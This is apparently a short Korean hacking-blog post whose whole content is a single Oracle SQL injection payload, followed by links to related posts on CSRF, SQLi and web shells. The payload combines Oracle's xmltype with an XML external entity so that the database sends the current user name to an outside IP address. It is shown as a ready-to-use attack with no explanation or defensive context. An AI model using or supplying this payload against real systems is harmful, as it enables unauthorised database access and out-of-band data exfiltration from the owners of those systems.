-
Oracle SQLi with XXEHACK/WEB 2019. 4. 18. 10:40
select extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "http://13.125.88.208/'||(SELECT user from dual)||'">%xxe;]>'),'/l') from dual
'HACK > WEB' 카테고리의 다른 글
Thread Requests Example (0) 2018.11.07 SQLite 테이블, 컬럼 정보 가져오기 (0) 2018.08.09 PROCEDURE ANALYSE - SQLi (0) 2018.08.03 JavaScript - CSRF (0) 2018.07.18 Only 특수문자 웹쉘(WebShell) (0) 2018.07.17